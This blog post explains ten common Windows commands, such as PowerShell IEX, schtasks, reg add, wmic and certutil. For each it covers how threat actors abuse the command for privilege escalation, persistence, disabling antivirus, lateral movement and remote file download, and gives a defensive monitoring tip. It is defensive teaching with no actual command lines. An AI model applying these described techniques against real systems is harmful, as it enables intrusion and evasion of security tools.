Understanding Common Windows Commands and How Threat Actors Use Them:

By Trent W

Photo by Tadas Sar on Unsplash

In this blog, we’ll explore a range of common Windows commands and how they are often used by threat actors to gain control, escalate privileges, maintain persistence, or move laterally across a network. We’ll also provide guidance on how security analysts can investigate these behaviors.

PowerShell (IEX – Invoke-Expression): Download Scripts in MemoryWhat It Is:PowerShell is a powerful scripting language built into Windows that allows users to automate tasks and manage configurations. The IEX (Invoke-Expression) command executes a string of PowerShell code directly from memory.

How Attackers Use It:

Threat actors often use PowerShell to execute malicious scripts in memory, which can help avoid detection by traditional file-based antivirus solutions. By using IEX to download and run scripts, attackers can avoid writing files to disk, reducing the likelihood of triggering file-based signature detection.

Defensive Tip:

Security analysts should monitor PowerShell activity, especially the use of IEX and similar in-memory execution techniques. One key indicator of suspicious activity is PowerShell scripts that are executed with obfuscated or encoded payloads.

2. Net User and Net Local Group: Modify Privileges

What It Is:

The net user and net localgroup commands allow users to manage user accounts and local group memberships on a Windows machine. These commands can be used to add, modify, or remove users from system groups.

How Attackers Use It:

Attackers often use these commands to escalate privileges by adding themselves to high-privilege groups like “Administrators” or “Domain Admins.” This is a common step in lateral movement and post-exploitation activities, allowing attackers to gain more control over a compromised system.

Defensive Tip:

Monitor for unusual changes to user accounts, particularly adding users to privileged groups. Consider setting up alerts for the use of net user and net localgroup to detect privilege escalation attempts.

3. schtasks: Establish Persistence

What It Is:

schtasks is a command-line utility that allows users to schedule tasks to run at specified times. It’s often used for automating system maintenance or running scripts.

How Attackers Use It:

Malicious actors often use schtasks to create scheduled tasks that persist even after the system is rebooted. These tasks can be set to run malware or scripts at specified intervals, helping attackers maintain long-term access to the compromised system.

Defensive Tip:

Security teams should regularly audit scheduled tasks for unusual activity. Look for tasks with unfamiliar names or commands, and investigate any tasks running with elevated privileges that don’t seem to belong to legitimate system processes.

4. reg add: Establish Persistence and Disable AV

What It Is:

The reg add command allows users to modify the Windows registry, adding or changing keys and values.

How Attackers Use It:

Attackers commonly use reg add to add registry keys that enable persistence, such as entries under the “Run” or “RunOnce” registry paths, which launch malware upon system startup. Attackers can also use it to disable antivirus or security software by modifying relevant registry entries.

Defensive Tip:

Regularly audit the registry for suspicious entries, especially under paths like HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run. Additionally, monitor for modifications to security-related registry keys that may disable or interfere with antivirus tools.

5. wmic: Lateral Movement and Recon

What It Is:

The Windows Management Instrumentation Command-line (WMIC) tool allows for system management and automation tasks, including querying system information, managing processes, and interacting with remote systems.

How Attackers Use It:

WMIC is often used by attackers for lateral movement within a network. By executing commands on remote systems, they can gather information about the network, such as user accounts, running processes, and network shares. It can also be used to execute commands on remote machines, making it a powerful tool for spreading malware.

Defensive Tip:

Monitor for unusual WMIC activity, such as commands that query remote systems or perform suspicious actions on systems that don’t match the typical usage patterns. WMIC-based lateral movement can often be detected by monitoring for unusual inbound or outbound network traffic related to WMI.

6. rundll32: Fileless Malware Hidden in DLL Files

What It Is:

rundll32 is a Windows utility that allows users to execute functions stored in dynamic link libraries (DLLs) without launching an executable file.

How Attackers Use It:

Attackers can use rundll32 to load and execute malicious code embedded in DLL files, a technique often used in fileless malware attacks. By executing code directly from memory, attackers can avoid detection by file-based antivirus programs.

Defensive Tip:

Monitor the use of rundll32, especially when it’s invoking DLLs from unusual or unexpected locations. This may indicate an attempt to run fileless malware or exploit a DLL hijacking vulnerability.

7. netstat: Shows Network Connections

What It Is:

netstat is a network utility that provides information about network connections, routing tables, and network interfaces.

How Attackers Use It:

Attackers can use netstat to gather information about active network connections and identify potential communication channels between compromised systems and command-and-control (C2) servers. This information helps attackers evade detection and persist in the network.

Defensive Tip:

Regularly review netstat output for unusual or unauthorized outbound connections, especially to known malicious IP addresses or countries. Pay attention to connections that may be indicative of C2 communication.

8. tasklist and taskkill: See and Kill Processes

What It Is:

The tasklist command shows a list of currently running processes, while taskkill allows users to terminate running processes.

How Attackers Use It:

Malicious actors use tasklist to identify processes running on the system, including security software or forensic tools. If they detect a process they want to avoid or terminate, they can use taskkill to stop it, hindering detection efforts or disrupting defensive measures.

Defensive Tip:

Look for unusual activity around tasklist and taskkill. Monitor for processes being terminated that are related to security tools, and investigate when privileged users execute these commands.

9. whoami: Admin Rights and Low-Privilege Accounts

What It Is:

The whoami command simply returns the username of the current user, along with group memberships.

How Attackers Use It:

Attackers use whoami to confirm their privileges on a compromised system. If they’re operating with low-level privileges, they can use this command to verify their user status and plan privilege escalation.

Defensive Tip:

Monitor the use of whoami by non-administrative users, as it may indicate an attacker trying to assess their access level before attempting to escalate privileges.

10. certutil: Transfer Files or Man-in-the-Middle Attacks

What It Is:

certutil is a command-line tool for managing certificates on Windows systems. It’s often used for creating, importing, or exporting certificates.

How Attackers Use It:

While primarily intended for managing certificates, certutil is frequently abused by attackers to download files from remote servers, bypassing traditional file transfer methods. In some cases, it’s used in Man-in-the-Middle (MitM) attacks to manipulate certificate stores or tamper with secure communications.

Defensive Tip:

Monitor the use of certutil for unexpected file transfers or modifications to certificates, particularly when it’s used to download or execute payloads. Pay close attention to outbound traffic patterns that may indicate exfiltration attempts.

Conclusion

Many of the commands listed above are legitimate and powerful tools within the Windows environment, but they can also be exploited by threat actors to carry out malicious activities. By understanding how these commands can be abused, defensive security analysts can develop better detection and response strategies to identify and mitigate attacks early. Regular monitoring, auditing, and analysis of system activity, along with using advanced threat detection tools, are critical in defending against these types of attacks.